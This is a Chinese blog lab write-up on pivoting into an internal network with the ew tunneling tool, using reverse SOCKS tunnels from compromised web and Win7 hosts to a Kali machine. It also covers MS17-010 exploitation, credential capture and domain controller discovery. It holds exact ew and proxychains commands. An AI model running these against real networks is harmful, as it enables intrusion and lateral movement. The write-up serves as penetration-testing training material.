内网入门学习-使用ew代理进入内网实验

admin

138880
文章

114
评论

2022年1月19日22:21:47评论585 views字数 2868阅读9分33秒阅读模式

13日

使用ew进行代理进入内网

前排招亲

0x00 前言

在某个辗转反侧的夜晚，爬起来看了一会书，然后就打开音乐做实验了。

整篇文章一步一步往下走，学习如何使用代理进入内网。

在文章的最后，才会放实验环境的拓扑图。

本实验主要是学会如何搭建代理

0x01 通过web服务器拿下内网win7

假设前提：我们已经拿下了一台web服务器（centos）

1、我们拥有了web服务器的控制权，但是我们发现就部署了一个很小的业务，没啥东西，因此在上面查看了一下这台服务器的信息，除了公网IP外，发现了它有另外一张网卡：192.168.22.0/24

2、通过一些优秀的网站管理工具，我们往web服务器上面上传了ew--一款网络穿透工具

3、在kali上面尝试访问web服务器的内网IP：192.168.22.129

内网入门学习-使用ew代理进入内网实验

公网访问内网自然是不能访问的，那我想去内网看看怎么办？只能依靠代理服务，将公网机器上面的程序代理到web服务器上面去运行（这是个人对于代理的理解，有误请赐教）

4、我们先在kali上面做正向代理，起一个转接隧道

./ew_for_linux64 -s rcsocks -l 1080 -e 1234

将本地的1080端口接收到的请求，转给本机的1234端口

内网入门学习-使用ew代理进入内网实验

5、在web服务器上面起反向代理

./ew_for_linux64 -s rssocks -d 192.168.100.221（kali IP地址） -e 1234

内网入门学习-使用ew代理进入内网实验

在kali配置etc/proxychains.conf代理设置

Socks5 127.0.0.1 1080

表示通过proxychains启动的软件都是走kali的1080端口

以下是个人对于上面操作的理解：

前面我们设置的1080端口的请求都会转给1234端口，centos又反向连接kali的1234端口，那么proxychains启动的软件，就会被代理到centos上面进行工作，也就是说在kali上面运行的软件，被代理到centos去运行。

6、使用代理启动nmap扫描内网

原本192.168.22.0在kali上面是不可以访问到的，无法扫描该网段，现在可以通过proxychains进行访问扫描

内网入门学习-使用ew代理进入内网实验

我们发现了一个IP：192.168.22.130，通过使用nmap其它参数 -A 进行扫描发现这是一台win7

7、使用代理启动msf

proxychains msfconsole

内网入门学习-使用ew代理进入内网实验

通过代理msf利用ms17-010进入win7，并且抓取到了域用户账号密码。

这里遇到了一个问题：
可能是因为用代理进行攻击，成功率太低了，我试了一个小时人品没爆发，就直接远程登录了，这部分操作暂时没法截图，其实也还有说使用另外一个方式会提高成功率，我单单搞环境就搞了好久，应该是镜像源的问题。
ms17-010在上一篇中已经实验过，那里使用的反弹的方式，这里是使用正向链接的方式。

8、通过代理远程登录win7

在上一步我们获取到了账号密码

Proxychains rdesktop 192.168.22.130

内网入门学习-使用ew代理进入内网实验

9、进行一波信息收集

发现居然还有另一张网卡，再一看，居然还是域用户

查域用户

内网入门学习-使用ew代理进入内网实验

查找域管理员

内网入门学习-使用ew代理进入内网实验

发现之前登录win7的账号居然是域管理员

赶紧找一下域管理器

查找域名

发现Hacke.testlab

内网入门学习-使用ew代理进入内网实验

判断域控服务器的IP地址

书上的nslookup解析域名的方式不成功（未百度到原因，希望有师傅指导一下），因此我试着ping一下，一般来说，会是域控制器，但不排除对方将域控制器和dns服务器分开部署。

内网入门学习-使用ew代理进入内网实验

0x02 阶段总结

至此我们拥有了以下东西：

一台web服务器：一个公网IP，一个内网IP

一台在域环境内的win7：一个内网IP（网段a）,一个内网IP（网段b）

域控服务器的IP地址

域管理员的账号密码

这里捋一下思路：

我们第一次使用ew进行代理，是在kali上面和web服务器上面进行了设置，从而使我们能够去访问win7

原因是web服务器有一个公网IP一个内网IP，win7也有一个内网IP，这两个内网IP属于同一个网段a.我们一开始就控制了web服务器，并在上面开启了socks代理，因此我们可以通过代理服务扫描网段a，从而发现了win7。

我们发现win7后，使用代理启动msf攻击，获取了win7的会话，发现win7居然有另外一个网段b,它居然是一个域主机，因此我们收集信息，发现了处于网段b里面的域控服务器。

我们要去域控看看！

但是我们访问不到网段b。

所以我们要利用win7做踏板，访问域控

0x03 web-win7-DC

前提：我们有web服务器，又通过ms17-010拿下win7，之前用网站管理工具都能上传ew,那么msf也是可以上传ew的，所以我们在win7上面也上传了ew

1、在web服务器上面：

./ew_linux_x64 -s rcsocks -l 6666 -e 5678

在web服务器上面添加一个转接隧道，把web服务器的6666端口接收到的请求发给5678端口。

内网入门学习-使用ew代理进入内网实验

2、在win7上面：

ew.exe-s rssocks -d 192.168.22.129 -e 5678

在win7上面开启socks5服务，并反弹到web服务器的5678端口

内网入门学习-使用ew代理进入内网实验

3、kali上面远程访问域控服务器

Kali本身可以访问web服务器，因此使用代理访问web服务器的6666端口的请求会被转到5678端口，然后被反连web服务器5678端口的win7接收并处理。

内网入门学习-使用ew代理进入内网实验

4、通过代理扫描192.168.33.3（dc）

内网入门学习-使用ew代理进入内网实验

0x04 最后总结

其实看着挺麻烦，做完整个实验后，我发现，前后两个代理都是二层代理：

第一个代理：

Kali-web-win7

1、通过web漏洞拿下了web,发现了有一个内网网段

2、好奇，想要看看这个网段有什么，但是外网不能访问内网网段，所以我们要让工具在web服务器上面跑。

3、在web服务器上面开启代理服务，这样就可以把我们的工具代理过去扫描。

4、成功的扫出来了win7

第二个代理：

Kali-web-win7-dc

做完实验后发现，其实就是将两层代理后移了

1、扫出来win7后，利用代理msf进行攻击拿下win7

2、发现有域，收集好信息

3、在win7上面开启代理服务

4、在web上面做一个转接，让kali的工具可以通过win7去扫描更深一层的网段

我原本想实验一下三层代理怎么搞，但是搞个二层就遇到了很多环境和别的问题，遇到的非代理问题，在文章中都省略了，如果有人也在做类似的实验，遇到的问题可以一起学习百度。

更多的代理实现及原理可以在ew的GitHub上面看，非常明了，多看几遍，如下图：

https://github.com/idlefire/ew

内网入门学习-使用ew代理进入内网实验

这个自己搞的靶场都问题多多，不得不说大佬们是真的狠，实际环境要复杂得多，各个却来去自如。

0x05 拓扑

内网入门学习-使用ew代理进入内网实验

0x06 other 其他

如您有任何问题、建议、需求请后台留言NOVASEC公众号！

团队初创，热烈希望现在以及未来的大佬们能够投稿支持！

感谢大哥们的对NOVASEC的支持点赞和关注，加入我们与萌新一起成长吧。

本文始发于微信公众号（NOVASEC）：内网入门学习-使用ew代理进入内网实验

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

内网入门学习-使用ew代理进入内网实验

对抗性机器学习-攻击和缓解的分类和术语（三）

记一次带学员渗透母校

Nosql注入学习记录

SQL注入漏洞实战

基于K8s日志审计实现攻击行为检测

Dr4g0n b4ll_1

XSS目前Web中的另类利用场景和绕Waf的Payload分享|挖洞技巧

文件上传黑名单限制的绕过总结

metasploit（1）生成远控木马

Ghost

发表评论

在线咨询

微信